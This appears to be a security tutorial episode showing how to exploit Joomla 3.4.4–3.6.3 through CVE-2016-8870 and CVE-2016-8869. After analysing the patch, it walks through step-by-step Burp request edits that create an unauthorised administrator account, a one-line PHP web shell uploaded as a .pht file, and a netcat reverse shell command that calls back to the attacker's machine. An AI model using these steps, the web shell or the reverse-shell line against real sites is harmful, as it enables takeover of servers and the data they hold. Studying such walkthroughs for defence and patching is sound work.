In the recent weeks, the entire security community has been shocked by two serious security vulnerabilities affecting all Joomla versions from 3.4.4 to 3.6.3: CVE-2016-8870 and CVE-2016-8869. Combining these vulnerabilities, an attacker can create a privileged user and potentially own the server hosting the Joomla website. In this episode, Gianni shows how to attack a Joomla site, upload a PHP shell, and get full access to the hosting server.
Tools, Scripts, and Exploits
The tools,scripts, and exploits used in this episode of #HackOnTuesday are:
» Joomla 3.6.3 (https://github.com/joomla/joomla-cms/releases/download/3.6.3/Joomla_3.6.3-Stable-Full_Package.tar.gz)
» Security Patch (https://github.com/joomla/joomla-cms/commit/2983d196840a7da2abf62c00ac2f3ee4864179b4)
1. Take a look at the changes/patch
» Go to Github page and click “releases”
» Click 2983d19 and scroll down to see the changes from the previous version
» Most of the changes happens in the components/com_users/controllers/user.php component
Enter your text here...
2. Analyze the “normal” registration process
» Enable “User Registration”
• Login with the admin/password credentials
• Go to System -> Global Configuration -> Users -> User Options and set “Allow User Registration” to “Yes”
» Create a user
• Go to the vulnerable Joomla website
• Click on “Author Login”
• Click on “Don’t have an account?”
• Enable the Burp Proxy
- Run the run_burp.sh script and make sure the Proxy is on.
- Set a proxy in Firefox
- Go to Edit -> Preferences -> Advances -> Network -> Settings
- Host: 127.0.0.1 / Port: 8080
• Complete the registration form and press “Register”
• Analyze the HTTP Request
- The “option” parameter is the name of the Joomla component in components/
- The “task” parameter is the name of the controller and method to be called
- In this case, registration.register calls the UserModelRegistration.register method
- cd components/com_users/
- ls -l
- vim models/registration.php
- The UserModelRegistration.register method performs few checks and if the registration is disabled, it redirects the user to the login page! See line 114 of the controllers/registration.php file.
3. Analyze the patch
» The patch removes the “register” method in the “UsersControllerUser” class. The register method does not check if a user is allowed to register new users and therefore an attacker can exploit this method to create a new user even if the “Allow User Registration” option is set to “No”! In particular:
» At line 301, the register method gets the form data.
• $data = $this->input->post->get(‘user‘, array(), ‘array‘);
» At line 304, the register method gets the “UsersModelRegistration” model.
• $model = $this->getModel(‘Registration’, ‘UsersModel’);
» At line 306, the register method gets the registration form.
• $form = $model->getForm();
» At line 315, the form data is validated.
• $return = $model->validate($form, $data);
» At line 346, the register method finalizes the registration using the register method of the “UsersModelRegistration” model.
• $return = $model->register($data);
4. Bypass the registration checks by calling the “register” method of the “User” controller
» Switch off the “Allow User Registration” option.
» Get the index.php/author-login page and take note of the CSRF token
» Send an old HTTP request of the registration to the Burp Repeater
• Change “jform” to “user”
• Change “registration.register” to “user.register”
• Change the CSRF token to the value of the hidden field in the login page.
• Change the URL to /joomla/index.php?option=com_users&task=user.register
» Go back to the Admin console and look for the list of users.
5. Create a privileged user
» Go to Users -> User Groups and look for the ID of the Administrator group.
» Add a “user[groups]” parameter in the request and use the default group ID of the Administrators group, 7.
6. Upload a PHP Shell
» Go to Content -> Media
» Click Options
» Add pht to “Legal Extensions (File Types)”
» Set “Restrict Uploads” and “Check MIME Types” to “No”
» Upload the shell.pht file
7. Get reverse shell
» Start a reverse shell listener in the attacker’s machine
• nc -lvp 4444
» Connect back to the attacker machine
• http://192.168.75.140/joomla/images/shell.pht?x=nc 192.168.75.146 4444 -e /bin/bash
» Game Over!
<?= system($_GET['x']); ?>
java -jar -Xmx1024m burp.jar